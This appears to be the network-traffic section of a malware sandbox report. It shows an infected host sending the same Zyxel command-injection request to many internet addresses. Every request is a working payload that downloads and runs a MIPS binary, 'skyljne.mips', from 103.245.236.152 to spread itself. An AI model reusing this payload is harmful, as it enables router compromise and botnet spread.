                                      Jan 14, 2024 15:50:59.594293118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7525192.168.2.1450654118.5.88.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594342947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7526192.168.2.145090617.123.66.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594403982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7527192.168.2.1448036219.26.9.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594451904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7528192.168.2.144454290.17.24.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594487906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7529192.168.2.1451634112.31.83.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594517946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7530192.168.2.144094661.214.147.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594554901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7531192.168.2.145208671.226.150.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594594002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7532192.168.2.1448456186.245.231.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594615936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7533192.168.2.145822078.211.89.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594628096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7534192.168.2.145771859.156.146.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594659090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7535192.168.2.1433776118.102.59.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594662905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7536192.168.2.1456896196.67.179.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594664097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7537192.168.2.1438042133.168.66.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594685078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7538192.168.2.144032489.105.47.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594738960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7539192.168.2.1454034155.108.26.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594804049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7540192.168.2.144757834.242.20.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594851017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7541192.168.2.143319298.182.111.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594876051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7542192.168.2.145821817.159.79.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594939947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7543192.168.2.1455696151.17.71.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594980955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7544192.168.2.1457080195.114.248.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595067978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7545192.168.2.143977443.28.79.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595077038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7546192.168.2.143788648.130.208.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595097065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7547192.168.2.1450538174.19.64.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595166922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7548192.168.2.143640074.138.141.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595213890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7549192.168.2.1454666122.172.157.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595258951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7550192.168.2.145821468.150.199.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595307112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7551192.168.2.1451922115.40.19.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595335960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7552192.168.2.1442820105.14.30.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595362902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7553192.168.2.1449744163.179.201.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595387936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7554192.168.2.145018623.146.43.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595441103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7555192.168.2.1442490134.245.42.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595465899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7556192.168.2.145072290.251.90.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595534086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7557192.168.2.1454364128.243.249.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595558882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7558192.168.2.1440518187.26.199.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595592976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7559192.168.2.14359329.125.51.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595650911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7560192.168.2.1433918106.97.161.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595691919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7561192.168.2.143858042.120.37.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595745087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7562192.168.2.1448022124.136.203.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595792055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7563192.168.2.1444454114.192.43.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595829010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7564192.168.2.1459134177.28.164.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595876932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7565192.168.2.1435896179.165.115.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595930099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7566192.168.2.144224632.165.26.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.595957994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7567192.168.2.145432243.204.46.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596007109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7568192.168.2.144071450.16.64.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596052885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7569192.168.2.1442350141.195.195.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596105099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7570192.168.2.1458868122.53.88.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596162081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7571192.168.2.145149082.215.184.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596189022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7572192.168.2.145931813.27.83.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596246958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7573192.168.2.1443400138.61.200.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596290112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7574192.168.2.1456020101.9.184.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596332073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7575192.168.2.1434032208.92.60.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596371889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7576192.168.2.145775467.140.140.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596386909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7577192.168.2.1448648111.133.164.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596443892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7578192.168.2.144866044.227.184.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596492052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7579192.168.2.145954277.227.187.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596546888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7580192.168.2.144246293.242.252.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596590996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7581192.168.2.1447726139.11.122.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596637964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7582192.168.2.145281043.15.137.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596679926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7583192.168.2.144899079.72.129.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596730947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7584192.168.2.145338675.168.22.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596762896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7585192.168.2.1449554110.184.72.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596816063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7586192.168.2.145499472.119.227.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.596863031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7587192.168.2.1445478134.214.75.217443
                                      TimestampBytes transferredDirectionData
